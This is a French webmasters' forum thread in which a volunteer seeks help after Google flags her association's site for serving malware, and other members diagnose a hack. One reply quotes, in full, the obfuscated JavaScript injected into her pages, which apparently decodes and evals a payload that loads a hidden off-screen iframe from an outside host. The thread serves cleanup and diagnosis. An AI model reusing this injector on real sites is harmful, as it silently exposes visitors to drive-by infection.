× Aidez la recherche contre le COVID-19 avec votre ordi ! Rejoignez l'équipe PC Astuces Folding@home
 > Tous les forums > Forum des Webmasters
 Alerte "ce site risque d'endommager votre ordinateur"
Ajouter un message à la discussion
Page : [1] 
Page 1 sur 1
carineb
  Posté le 30/10/2013 @ 19:48 
Aller en bas de la page 
Petite astucienne

JBonjour,

J'ai créé il y a plusieurs années un site internet pour une association. Depuis quelques jours il y a un message d'alerte qui apparait quand on veut accéder à ce site par le moteur de recherche google.

Pour accéder au site cliquez ici

Avertissement- Attention, l'accès à ce site risque d'endommager votre ordinateur.

Ce site est répertorié comme suspect. Une visite sur celui-ci peut endommager votre ordinateur.
Une activité suspecte sur une partie de ce site a été détectée 1 fois au cours des 90 derniers jours.

Sur les 5 pages du site que nous avons testées au cours des 90 derniers jours, un certain nombre (3) entraînait le téléchargement et l'installation de logiciels malveillants sans l'autorisation de l'utilisateur. La dernière visite effectuée par le robot Google sur ce site a eu lieu le 2013-10-27, et le dernier contenu suspect sur celui-ci a été détecté le 2013-10-27.

Parmi les logiciels malveillants, les éléments suivants sont présents : 7 exploit(s), 4 scripting exploit(s).

Ce site était hébergé sur 1 réseau(x), y compris AS12322 (PROXAD).

Ce site a-t-il hébergé des logiciels malveillants ?
Oui, ce site a hébergé des logiciels malveillants au cours des 90 derniers jours. Il a infecté 2 domaine(s), y compris yakhou.com/, infodium.info/.

Que s'est-il passé ?
Dans certains cas, des tiers peuvent ajouter du code malveillant sur des sites légitimes, ce qui déclenche l'affichage du message d'avertissement.

J'ai cliqué sur les liens qui mènent vers le diagnostic et les informations pour désinfecter le site mais je ne comprends pas grand chose.

Est-ce que quelqu'un saurait identifier rapidement d'où vient le problème et quels sont les codes du site à modifier ou les pages à supprimer pour résoudre ce problème.

Merci

Publicité
Jean-Pierre
 Posté le 30/10/2013 à 20:09 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

Ce site est hébergé chez Free.fr

En effet c'est bourrrrrrrrrrrrrrrrrré de vilaines bêbêtes je confirme !

As-tu encore la main sur ce site ?

Et ensuite ? https://forum.pcastuces.com/sujet.asp?page=-1&f=25&s=32410&REP_ID=2363615



Modifié par Jean-Pierre le 30/10/2013 20:17
carineb
 Posté le 30/10/2013 à 20:22 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

Oui, j'ai encore la main dessus.

Ca faisait des années que je ne l'avais pas mis à jour mais je bien mes codes d'accès et j'arrive à me connecter sur la page ftpperso.free.fr

Dreamer
 Posté le 30/10/2013 à 20:23 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

Bon deux trucs en JS (javascript)

- Le blocage du clic droit, c'est une inutile, donc à virer !!

- Un autre JS dont je doute de l'utilité, ça ressemble à rien, donc suspect, vires-le sur toutes tes pages !! :

<script type="text/javascript" language="javascript"> qke="spl"+"i"+"t";xfsn=window;okevxh="0"+"x";bpw=(5-3-1);try{--(document["body"])}catch(imugb){bdiep=false;try{}catch(vfoj){bdiep=21;}if(1){zjgepl="17:5d:6c:65:5a:6b:60:66:65:17:69:6a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:6a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:69:6a:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:61:6c:5c:5e:66:6a:5b:5c:63:5f:58:64:59:69:5c:25:5a:66:64:26:5e:58:63:5c:69:60:58:26:6b:69:58:5d:25:67:5f:67:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2e:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2e:67:6f:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2e:67:6f:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2e:1e:32:4:1:17:69:6a:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2e:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:6a:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:69:6a:53:1e:17:5a:63:58:6a:6a:34:53:1e:69:6a:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:6a:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:69:6a:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:69:6a:27:30:1f:20:32:4:1:74:4:1:74"[qke](":");}xfsn=zjgepl;rpw=[];for(ltx=22-20-2;-ltx+1386!=0;ltx+=1){rqjq=ltx;if((0x19==031))rpw+=String.fromCharCode(eval(okevxh+xfsn[1*rqjq])+0xa-bpw);}fhthqf=eval;fhthqf(rpw)}</script>

Une autre chose, ne fait pas de texte invisible (blanc sur fond blanc, les moteurs de recherche n'aiment pas !! )

<p><font color="#FFFFFF">Organisation de visites et circuits avec guides à
Ghardaïa et ses environs et dans le sud algérien.<br>
Organisation d'expositions et événements culturels.<br>
Soutien et orientation des chercheurs, ethnologues, architectes,
scientifiques...</font></p>

Et enfin, ton site utilise des balises obsolètes (font-color, align=center, etc ...!!)

carineb
 Posté le 30/10/2013 à 20:32 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne
Jean-Pierre a écrit :
Et ensuite ? https://forum.pcastuces.com/sujet.asp?page=-1&f=25&s=32410&REP_ID=2363615

Jean-Pierre,

Tu me renvoies vers un message que j'avais posté il y a quelques années mais je ne vois pas bien le lien (mais peut-être que je me trompe, tu me le diras !).

Le président de l'asso m'a informée aujourd'hui qu'il a été alerté depuis quelques jours par des clients qui ne pouvaient plus accéder au site.

Je ne me suis pas connectée au pages persos de free depuis des années donc j'ai du mal à comprendre comment mon ordi pourrait avoir infecté le site ces derniers jours.

J'ai donc l'impression qu'il faudrait plutôt faire une analyse du site pour régler le problème du site internet. Mais je ne sais pas comment faire.

(Je vais néanmoins lancé une analyse de mon ordi. Un petit nettoyage d'automne ne lui fera pas de mal !)

Jean-Pierre
 Posté le 30/10/2013 à 20:42 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

Je me demandais si toi seule... avait les identifiants permettant de se connecter.

Si une seule ou plusieurs machines/personnes seraient impliquées, car tu parles d'une asso.

Voilà tu sais tout.

Dreamer
 Posté le 30/10/2013 à 20:44 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

Un piratage me semble plus sensé !!

carineb
 Posté le 30/10/2013 à 20:47 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne
Dreamer a écrit :

Bon deux trucs en JS (javascript)

- Le blocage du clic droit, c'est une inutile, donc à virer !!

- Un autre JS dont je doute de l'utilité, ça ressemble à rien, donc suspect, vires-le sur toutes tes pages !! :

Une autre chose, ne fait pas de texte invisible (blanc sur fond blanc, les moteurs de recherche n'aiment pas !! )

Organisation de visites et circuits avec guides à
Ghardaïa et ses environs et dans le sud algérien.

Organisation d'expositions et événements culturels.

Soutien et orientation des chercheurs, ethnologues, architectes,
scientifiques...

Et enfin, ton site utilise des balises obsolètes (font-color, align=center, etc ...!!)

Merci, je vais faire ça ce week-end.

Petite question : à l'époque où j'ai créé ce site j'avais utilisé un logiciel assez simple et gratuit qui permettait de créer très simplement les pages (sans connaître les codes, balises...) mais je ne me souviens plus du tout de son nom et entre temps j'ai changé d'ordi donc je n'ai plus ce logiciel.

Quel est le logiciel que je pourrais utiliser pour faire ces modifications assez simplement et faire aussi quelques optimisations du site ?

Merci

Jean-Pierre
 Posté le 30/10/2013 à 21:04 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

Quel est le logiciel que je pourrais utiliser pour faire ces modifications assez simplement

Le meilleur serait tes petites mimines... via Notepad++

Car elles n'ajoutent pas derrière ton dos, du code superflu...

https://forum.pcastuces.com/sujet.asp?f=1&s=125531



Modifié par Jean-Pierre le 30/10/2013 21:08
Publicité
eliot3
 Posté le 30/10/2013 à 21:04 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Grand Maître astucien

Jean-Pierre
 Posté le 30/10/2013 à 21:10 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

eliot3

Tu n'as pas tout vu encore

eliot3
 Posté le 30/10/2013 à 21:11 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Grand Maître astucien
Jean-Pierre a écrit :

Ce site est hébergé chez Free.fr

Jean Pierre,

Je te comprends pas pour Free, le mien a été longtemps sur Free avant que je prenne un espace Web sans aucun souci .

Dreamer suis encore en vie

carineb
 Posté le 30/10/2013 à 21:19 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne
Jean-Pierre a écrit :

Je me demandais si toi seule... avait les identifiants permettant de se connecter.

Si une seule ou plusieurs machines/personnes seraient impliquées, car tu parles d'une asso.

Voilà tu sais tout.

Non, je suis la seule à avoir les codes d'accès.

carineb
 Posté le 30/10/2013 à 21:23 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne
Jean-Pierre a écrit :

Quel est le logiciel que je pourrais utiliser pour faire ces modifications assez simplement

Le meilleur serait tes petites mimines... via Notepad++

Car elles n'ajoutent pas derrière ton dos, du code superflu...

https://forum.pcastuces.com/sujet.asp?f=1&s=125531

Ok, merci. Je vais sortir mes mimines !

Jean-Pierre
 Posté le 30/10/2013 à 21:25 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

carineb a écrit :
Jean-Pierre a écrit :

Je me demandais si toi seule... avait les identifiants permettant de se connecter.

Si une seule ou plusieurs machines/personnes seraient impliquées, car tu parles d'une asso.

Voilà tu sais tout.

Non, je suis la seule à avoir les codes d'accès.

Donc comme disait notre copain Jojo, tu as certainement été victime d'un piratage !

N'oublie pas de changer tes identifiants.

Mais effectue tout de même une analyse sérieuse de ta bécane !

elle
 Posté le 30/10/2013 à 22:01 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Grande Maîtresse astucienne

Au secours! Elle est trop longue!



Modifié par elle le 30/10/2013 22:03
Dreamer
 Posté le 31/10/2013 à 00:26 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Maître astucien

elle a écrit :

Au secours! Elle est trop longue!

Euh, de quoi parles-tu mon enfant ??

Page : [1] 
Page 1 sur 1

Vous devez être connecté pour poster des messages. Cliquez ici pour vous identifier.

Vous n'avez pas de compte ? Créez-en un gratuitement !


Les bons plans du moment PC Astuces

Tous les Bons Plans
129 €Sonde de calibration Datacolor SpyderX Pro à 129 €
Valable jusqu'au 12 Juillet

Amazon fait une promotion sur la sonde de calibration Datacolor SpyderX Pro qui passe à 129 € alors qu'on la trouve ailleurs à partir de 179 €. La livraison est gratuite. Cette solution avancée d'étalonnage vous permettra de régler parfaitement les couleurs de votre écran afin d'avoir un rendu le plus fidèle possible.


> Voir l'offre
214,99 €Disque dur externe Seagate Backup Plus Hub 10 To USB 3.0 à 214,99 €
Valable jusqu'au 15 Juillet

Amazon propose actuellement le disque dur externe Seagate 10 To Backup Plus Hub USB 3.0 à 214,99 € livré gratuitement. On le trouve ailleurs à partir de 300 €. Grâce à la connectique USB 3.0 (compatible USB 2.0), ce disque dur vous offrira d'excellents débits pour vos transferts et vos sauvegardes. Doté de deux ports USB intégrés en façade, ce disque vous permet de sauvegarder vos fichiers, ainsi que vos photos et vidéos, tout en parcourant et en rechargeant votre tablette, smartphone ou appareil photo, même si votre système est éteint ou en veille.


> Voir l'offre
5,94 €6 caches caméra Kiwi à 5,94 €
Valable jusqu'au 12 Juillet

Amazon fait une promotion sur le lot de 6 caches caméra Kiwi qui passe à 5,94 € au lieu d'une dizaine d'euros. Ces caches ultra-minces vont vous permettre de masquer la webcam intégrée à votre ordinateur (qui peut facilement être piratée) ou à votre tablette lorsque vous ne l'utilisez pas. Faites glisser le cache avec votre doigt lorsque vous aurez besoin d'utiliser votre webcam. Un lot avec un mix de caches noirs et blancs est également en promo au même prix.


> Voir l'offre

Sujets relatifs
test poids upload + alerte
alerte visiteur (possible)
Aide PHPBB suite alerte ver Santi.A (résolu)
forum avec alerte message par mail
 > Tous les forums > Forum Forum des Webmasters